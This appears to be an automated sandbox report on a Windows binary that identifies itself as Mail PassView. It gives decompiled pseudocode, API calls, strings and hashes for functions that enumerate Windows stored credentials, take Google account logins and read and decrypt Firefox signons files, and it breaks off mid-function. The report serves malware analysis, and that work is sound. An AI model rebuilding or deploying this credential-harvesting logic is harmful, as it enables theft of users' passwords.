                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,73AFF420), ref: 00404654
                                                                                • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                • GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                • API String ID: 2449869053-4258758744
                                                                                • Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                • Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
                                                                                • Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                • Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411015, Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 76%
                                                                                			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
				void _v8;
				void _v12;
				void _v24;
				char _v39;
				void _v40;
				char _v132;
				void _v1156;
				void _v1172;
				char _v1180;
				void _v1187;
				char _v1188;
				void _v2228;
				void _v2243;
				void _v2244;
				void _v3267;
				char _v3268;
				void _v4291;
				char _v4292;
				char _v5340;
				void _v5347;
				char _v5348;
				char _v6116;
				char _v7136;
				void _v7140;
				void* __edi;
				void* __esi;
				int _t86;
				void* _t109;
				void* _t122;
				void* _t135;
				char _t156;
				signed char _t168;
				signed int _t171;
				intOrPtr _t177;
				signed int _t183;
				void* _t185;

				_t171 = __edx;
				E004118A0(0x1be4, __ecx);
				_t156 = 0;
				_v3268 = 0;
				memset( &_v3267, 0, 0x3ff);
				_a8 = E00410E8A(_a8,  &_v3268);
				_t86 = strlen(_a4);
				_v8 = _t86;
				if(_a8 > 4) {
					_t193 = _t86;
					if(_t86 > 0) {
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_v2244 = 0;
						memset( &_v2243, 0, 0x41e);
						_v1188 = 0;
						memset( &_v1187, 0, 0x41e);
						_v5348 = 0;
						memset( &_v5347, 0, 0x41e);
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_v4292 = 0;
						memset( &_v4291, 0, 0x3ff);
						E0040BC49( &_v132);
						E0040BC6D(_v8,  &_v132, _a4);
						_t181 =  &_v132;
						E0040BD0B( &_v39,  &_v132,  &_v2244);
						memcpy( &_v2228,  &_v24, 8);
						E0040BC49( &_v132);
						_push( &_v2244);
						_t109 = 0x18;
						E0040BC6D(_t109,  &_v132);
						E0040BD0B( &_v39, _t181,  &_v1188);
						memcpy( &_v1172,  &_v2244, 0x10);
						memcpy( &_v1156,  &_v24, 8);
						E0040BC49(_t181);
						_push( &_v1188);
						_t122 = 0x28;
						E0040BC6D(_t122, _t181);
						E0040BD0B( &_v39, _t181,  &_v5348);
						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);
						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
						_t177 = _a8;
						asm("cdq");
						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
						_a4 = 0;
						if(_t183 > 0) {
							do {
								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
								_a4 =  &(_a4[1]);
							} while (_a4 < _t183);
							_t177 = _a8;
						}
						_t135 = 0;
						if(_t177 > _t156) {
							do {
								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
								_t135 = _t135 + 1;
								 *(_t185 + _t135 - 0x1be1) = _t168;
							} while (_t135 < _t177);
						}
						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
						strcpy(_a12,  &_v7136);
						E0040BC49( &_v132);
						_t67 = _t177 - 4; // 0x0
						E0040BC6D(_t67,  &_v132, _a12);
						E0040BD0B(_t177,  &_v132,  &_v40);
						memcpy( &_v8,  &_v40, 4);
						memcpy( &_v12,  &_v7140, 4);
						_t156 = 1;
						 *_a16 = 0 | _v8 == _v12;
					}
				}
				return _t156;
			}







































                                                                                0x00411015
                                                                                0x0041101d
                                                                                0x00411025
                                                                                0x00411034
                                                                                0x0041103a
                                                                                0x00411053
                                                                                0x00411056
                                                                                0x00411060
                                                                                0x00411063
                                                                                0x00411069
                                                                                0x0041106b
                                                                                0x00411079
                                                                                0x0041107a
                                                                                0x0041107b
                                                                                0x0041108a
                                                                                0x00411090
                                                                                0x0041109e
                                                                                0x004110a4
                                                                                0x004110b2
                                                                                0x004110b8
                                                                                0x004110bf
                                                                                0x004110c5
                                                                                0x004110c6
                                                                                0x004110c7
                                                                                0x004110c8
                                                                                0x004110cf
                                                                                0x004110d8
                                                                                0x004110de
                                                                                0x004110e6
                                                                                0x004110f4
                                                                                0x00411100
                                                                                0x00411103
                                                                                0x00411115
                                                                                0x0041111f
                                                                                0x0041112a
                                                                                0x0041112d
                                                                                0x00411130
                                                                                0x0041113c
                                                                                0x00411151
                                                                                0x00411163
                                                                                0x0041116a
                                                                                0x00411175
                                                                                0x00411178
                                                                                0x0041117b
                                                                                0x00411187
                                                                                0x004111a6
                                                                                0x004111be
                                                                                0x004111c3
                                                                                0x004111c8
                                                                                0x004111d0
                                                                                0x004111d8
                                                                                0x004111db
                                                                                0x004111dd
                                                                                0x004111f8
                                                                                0x004111fd
                                                                                0x00411203
                                                                                0x00411206
                                                                                0x00411206
                                                                                0x00411209
                                                                                0x0041120d
                                                                                0x0041120f
                                                                                0x00411216
                                                                                0x0041121d
                                                                                0x00411220
                                                                                0x00411220
                                                                                0x0041120f
                                                                                0x00411233
                                                                                0x0041123a
                                                                                0x00411242
                                                                                0x0041124a
                                                                                0x00411250
                                                                                0x0041125c
                                                                                0x0041126b
                                                                                0x0041127d
                                                                                0x00411295
                                                                                0x00411296
                                                                                0x00411296
                                                                                0x0041106b
                                                                                0x0041129e

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041103A
                                                                                  • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                • strlen.MSVCRT ref: 00411056
                                                                                • memset.MSVCRT ref: 00411090
                                                                                • memset.MSVCRT ref: 004110A4
                                                                                • memset.MSVCRT ref: 004110B8
                                                                                • memset.MSVCRT ref: 004110DE
                                                                                  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                  • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                • memcpy.MSVCRT ref: 00411115
                                                                                  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                • memcpy.MSVCRT ref: 00411151
                                                                                • memcpy.MSVCRT ref: 00411163
                                                                                • strcpy.MSVCRT(?,?), ref: 0041123A
                                                                                • memcpy.MSVCRT ref: 0041126B
                                                                                • memcpy.MSVCRT ref: 0041127D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpymemset$strlen$strcpy
                                                                                • String ID: salu
                                                                                • API String ID: 2660478486-4177317985
                                                                                • Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                • Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
                                                                                • Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                • Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403E87, Relevance: 19.6, APIs: 7, Strings: 6, Instructions: 98stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 81%
                                                                                			E00403E87(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t36;
				void* _t37;
				void* _t48;
				void* _t55;
				intOrPtr* _t56;
				signed int _t58;
				intOrPtr* _t63;
				void* _t70;
				void* _t71;

				_t56 = __ecx;
				E004118A0(0x1048, __ecx);
				_t63 = _t56;
				_v8 = _t63;
				E00405EFD(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t71 = _t70 + 0x2c;
				if( *0x417308 != 0) {
					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x417308);
					_t71 = _t71 + 0xc;
				}
				if( *0x417304 != 0) {
					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
				}
				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
				_t58 = 0x10;
				_push(_t36);
				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
				E00405EFD(_a4,  &_v4172);
				_push("Mail PassView");
				_t55 = 6;
				_push(E004078FF(_t55));
				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_t48 = E00405EFD(_a4,  &_v2124);
				_t78 = _a8 - 4;
				if(_a8 == 4) {
					return E004097E6(_v8, _t78, _a4);
				}
				return _t48;
			}























                                                                                0x00403e87
                                                                                0x00403e8f
                                                                                0x00403e9f
                                                                                0x00403ea1
                                                                                0x00403ea4
                                                                                0x00403eb9
                                                                                0x00403ebf
                                                                                0x00403ecd
                                                                                0x00403ed3
                                                                                0x00403ee1
                                                                                0x00403ee7
                                                                                0x00403eec
                                                                                0x00403ef5
                                                                                0x00403f08
                                                                                0x00403f0d
                                                                                0x00403f0d
                                                                                0x00403f16
                                                                                0x00403f24
                                                                                0x00403f2a
                                                                                0x00403f2f
                                                                                0x00403f34
                                                                                0x00403f35
                                                                                0x00403f3e
                                                                                0x00403f5a
                                                                                0x00403f5b
                                                                                0x00403f6a
                                                                                0x00403f72
                                                                                0x00403f79
                                                                                0x00403f7f
                                                                                0x00403f8c
                                                                                0x00403f9b
                                                                                0x00403fa3
                                                                                0x00403fa7
                                                                                0x00000000
                                                                                0x00403faf
                                                                                0x00403fb8

                                                                                APIs
                                                                                  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                                • memset.MSVCRT ref: 00403EBF
                                                                                • memset.MSVCRT ref: 00403ED3
                                                                                • memset.MSVCRT ref: 00403EE7
                                                                                • sprintf.MSVCRT ref: 00403F08
                                                                                • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
                                                                                • sprintf.MSVCRT ref: 00403F5B
                                                                                • sprintf.MSVCRT ref: 00403F8C
                                                                                Strings
                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
                                                                                • <table dir="rtl"><tr><td>, xrefs: 00403F1E
                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97
                                                                                • Mail PassView, xrefs: 00403F72
                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memsetsprintf$FileWritestrcpystrlen
                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
                                                                                • API String ID: 1043021993-495024357
                                                                                • Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                • Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
                                                                                • Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                • Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404288, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00404288(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
				intOrPtr _v8;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				wchar_t* _t23;
				char* _t41;
				wchar_t** _t59;
				void* _t76;

				_t76 = __fp0;
				_t59 = _a4;
				_t23 =  *_t59;
				_v8 = __ecx;
				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
					E004021D8( &_v940);
					_v800 = 7;
					_v412 = 3;
					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
					strcpy( &_v928,  &_v408);
					strcpy( &_v796,  &_v408);
					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
						sprintf( &_v796, "%s@gmail.com",  &_v408);
					}
					_t41 = strchr( &_v928, 0x40);
					if(_t41 != 0) {
						 *_t41 = 0;
					}
					E00402407( &_v940, _t76, _v8 + 0xfffff788);
				}
				return 1;
			}















                                                                                0x00404288
                                                                                0x00404293
                                                                                0x00404296
                                                                                0x0040429c
                                                                                0x0040429f
                                                                                0x004042d3
                                                                                0x004042ee
                                                                                0x004042fa
                                                                                0x00404304
                                                                                0x00404318
                                                                                0x00404328
                                                                                0x0040433b
                                                                                0x00404354
                                                                                0x0040437e
                                                                                0x00404383
                                                                                0x0040438f
                                                                                0x00404398
                                                                                0x0040439a
                                                                                0x0040439a
                                                                                0x004043ab
                                                                                0x004043ab
                                                                                0x004043b6

                                                                                APIs
                                                                                • wcsstr.MSVCRT ref: 004042BD
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
                                                                                • strcpy.MSVCRT(?,?), ref: 00404328
                                                                                • strcpy.MSVCRT(?,?,?,?), ref: 0040433B
                                                                                • strchr.MSVCRT ref: 00404349
                                                                                • strlen.MSVCRT ref: 0040435D
                                                                                • sprintf.MSVCRT ref: 0040437E
                                                                                • strchr.MSVCRT ref: 0040438F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                                                • String ID: %s@gmail.com$www.google.com
                                                                                • API String ID: 1359934567-4070641962
                                                                                • Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                • Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
                                                                                • Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                • Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040827A, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E0040827A(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
				void _v4103;
				char _v4104;
				int _t21;
				int _t28;
				void* _t35;

				_t35 = __eflags;
				E004118A0(0x1004, __ecx);
				strcpy(0x4171b8, _a8);
				strcpy(0x4172c0, "general");
				E00407E55(_t35, "TranslatorName", 0x412466);
				E00407E55(_t35, "TranslatorURL", 0x412466);
				EnumResourceNamesA(_a4, 4, E004080A3, 0);
				EnumResourceNamesA(_a4, 5, E004080A3, 0);
				strcpy(0x4172c0, "strings");
				_t28 = 0;
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				do {
					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
					if(_t21 > 0) {
						_t21 = E00407EC3(_t28,  &_v4104);
					}
					_t28 = _t28 + 1;
				} while (_t28 <= 0xffff);
				 *0x4171b8 = 0;
				return _t21;
			}








                                                                                0x0040827a
                                                                                0x00408282
                                                                                0x00408292
                                                                                0x004082a2
                                                                                0x004082b2
                                                                                0x004082bd
                                                                                0x004082d8
                                                                                0x004082e2
                                                                                0x004082ea
                                                                                0x004082f5
                                                                                0x004082ff
                                                                                0x00408306
                                                                                0x0040830e
                                                                                0x0040831a
                                                                                0x00408322
                                                                                0x0040832c
                                                                                0x00408332
                                                                                0x00408333
                                                                                0x00408334
                                                                                0x0040833e
                                                                                0x00408347

                                                                                APIs
                                                                                • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
                                                                                • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2
                                                                                  • Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
                                                                                  • Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
                                                                                  • Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5
                                                                                • EnumResourceNamesA.KERNEL32(00000104,00000004,004080A3,00000000), ref: 004082D8
                                                                                • EnumResourceNamesA.KERNEL32(00000104,00000005,004080A3,00000000), ref: 004082E2
                                                                                • strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
                                                                                • memset.MSVCRT ref: 00408306
                                                                                • LoadStringA.USER32 ref: 0040831A
                                                                                  • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                • API String ID: 1060401815-3647959541
                                                                                • Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                                • Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
                                                                                • Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                                • Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D1EC, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 128stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				void* _t31;
				int _t40;
				void* _t44;
				void* _t49;
				char* _t50;
				void* _t57;
				int _t62;
				char* _t68;
				void* _t70;
				void* _t73;
				void* _t74;
				intOrPtr* _t86;
				char* _t89;
				void* _t90;
				char** _t91;

				_t86 = __eax;
				_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
				_t94 = _t31;
				if(_t31 == 0) {
					__eflags = 0;
					return 0;
				}
				E0040462E(_t86 + 0x468);
				_t68 = _t86 + 0x158;
				E004061FF(_t68, _a4);
				_t89 = _t86 + 0x25d;
				 *_t89 = 0;
				E0040C530(_t94, _t86 + 0x18);
				if( *_t89 == 0) {
					_t62 = strlen(_t68);
					 *_t91 = "signons.txt";
					_t9 = strlen(??) + 1; // 0x1
					if(_t62 + _t9 >= 0x104) {
						 *_t89 = 0;
					} else {
						E004062AD(_t89, _t86 + 0x158, "signons.txt");
					}
				}
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t40 = strlen(_t86 + 0x158);
				_t91[3] = "signons.sqlite";
				_t15 = strlen(??) + 1; // 0x1
				_pop(_t73);
				if(_t40 + _t15 >= 0x104) {
					_v268 = 0;
				} else {
					E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
					_pop(_t73);
				}
				_t98 =  *_t89;
				if( *_t89 != 0) {
					_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
					_t99 = _t57;
					if(_t57 != 0) {
						E0040C475(_t73, _t86, _t99);
					}
				}
				_t44 = E0040614B( &_v268);
				_t100 = _t44;
				_pop(_t74);
				if(_t44 != 0) {
					E0040CE28(_t74, _t100, _t86,  &_v268);
				}
				_t70 = 0;
				if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
					L19:
					return 1;
				} else {
					do {
						_t90 = E0040D438(_t70, _t86 + 0x468);
						_t24 = _t90 + 0x504; // 0x504
						_t49 = _t24;
						_push("none");
						_push(_t49);
						L004115B2();
						if(_t49 != 0) {
							_t25 = _t90 + 4; // 0x4
							_t50 = _t25;
							if( *_t50 == 0) {
								_t26 = _t90 + 0x204; // 0x204
								strcpy(_t50, _t26);
							}
							 *((intOrPtr*)( *_t86 + 4))(_t90);
						}
						_t70 = _t70 + 1;
					} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
					goto L19;
				}
			}






















                                                                                0x0040d1fb
                                                                                0x0040d200
                                                                                0x0040d205
                                                                                0x0040d207
                                                                                0x0040d371
                                                                                0x00000000
                                                                                0x0040d371
                                                                                0x0040d213
                                                                                0x0040d21b
                                                                                0x0040d223
                                                                                0x0040d22c
                                                                                0x0040d233
                                                                                0x0040d236
                                                                                0x0040d23e
                                                                                0x0040d241
                                                                                0x0040d248
                                                                                0x0040d254
                                                                                0x0040d25e
                                                                                0x0040d277
                                                                                0x0040d260
                                                                                0x0040d26e
                                                                                0x0040d274
                                                                                0x0040d25e
                                                                                0x0040d288
                                                                                0x0040d28f
                                                                                0x0040d29e
                                                                                0x0040d2a5
                                                                                0x0040d2b1
                                                                                0x0040d2ba
                                                                                0x0040d2bb
                                                                                0x0040d2d8
                                                                                0x0040d2bd
                                                                                0x0040d2cf
                                                                                0x0040d2d5
                                                                                0x0040d2d5
                                                                                0x0040d2df
                                                                                0x0040d2e2
                                                                                0x0040d2e8
                                                                                0x0040d2ed
                                                                                0x0040d2ef
                                                                                0x0040d2f1
                                                                                0x0040d2f1
                                                                                0x0040d2ef
                                                                                0x0040d2fd
                                                                                0x0040d302
                                                                                0x0040d304
                                                                                0x0040d305
                                                                                0x0040d30f
                                                                                0x0040d30f
                                                                                0x0040d314
                                                                                0x0040d31c
                                                                                0x0040d36c
                                                                                0x00000000
                                                                                0x0040d31e
                                                                                0x0040d31e
                                                                                0x0040d32b
                                                                                0x0040d32d
                                                                                0x0040d32d
                                                                                0x0040d333
                                                                                0x0040d338
                                                                                0x0040d339
                                                                                0x0040d342
                                                                                0x0040d344
                                                                                0x0040d344
                                                                                0x0040d34a
                                                                                0x0040d34c
                                                                                0x0040d354
                                                                                0x0040d35a
                                                                                0x0040d360
                                                                                0x0040d360
                                                                                0x0040d363
                                                                                0x0040d364
                                                                                0x00000000
                                                                                0x0040d31e

                                                                                APIs
                                                                                  • Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
                                                                                  • Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74
                                                                                  • Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635
                                                                                  • Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
                                                                                  • Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C
                                                                                  • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
                                                                                  • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
                                                                                  • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
                                                                                  • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
                                                                                  • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6
                                                                                • strlen.MSVCRT ref: 0040D241
                                                                                • strlen.MSVCRT ref: 0040D24F
                                                                                  • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                  • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                • memset.MSVCRT ref: 0040D28F
                                                                                • strlen.MSVCRT ref: 0040D29E
                                                                                • strlen.MSVCRT ref: 0040D2AC
                                                                                • _stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
                                                                                • strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                                • String ID: none$signons.sqlite$signons.txt
                                                                                • API String ID: 2681923396-1088577317
                                                                                • Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                • Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
                                                                                • Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                • Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402C44, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
				void* _v8;
				int _v12;
				char _v16;
				char _v20;
				void _v275;
				char _v276;
				void _v1299;
				char _v1300;
				void* __esi;
				void* _t35;
				intOrPtr _t36;
				void* _t40;
				void* _t52;
				void* _t58;
				void* _t60;
				void* _t64;
				char* _t66;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t83;

